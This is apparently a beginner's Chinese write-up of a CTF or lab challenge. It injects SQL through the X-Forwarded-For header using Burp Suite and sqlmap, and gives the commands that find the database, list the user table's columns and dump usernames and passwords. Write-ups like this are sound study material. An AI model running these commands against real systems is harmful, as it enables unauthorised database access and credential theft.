前言:
小白昨天在利用sqlmap注入的时候,死活不成功(连接超时),把我搞崩溃了,今天又试了一下还是如此。 当我把小飞机(科学上网)关了,再次尝试,成功了!所以如果和我有一样状况的新手们可要注意这个问题哦。
步骤一:
利用burpsuite抓包并且发送到reperter, 添加x-forwarded-for:*
1.将Request的Raw内容复制到自己新建的一个txt文档,命名为xff。 2.将xff.txt拷贝到sqlmap文件夹所在的文件位置(注意,是放在sqlmap文件夹里头)
运行sqlmap: 1.爆出当前的数据库
sqlmap.py -r xff.txt --current-db --batch
2.爆表名
sqlmap.py -r xff.txt -D webcalendar -T user --columns --batch
3.爆表中的字段
sqlmap.py -r xff.txt -D webcalendar -T user -C username,password --dump --batch
得到username和password,进行登陆,拿到key
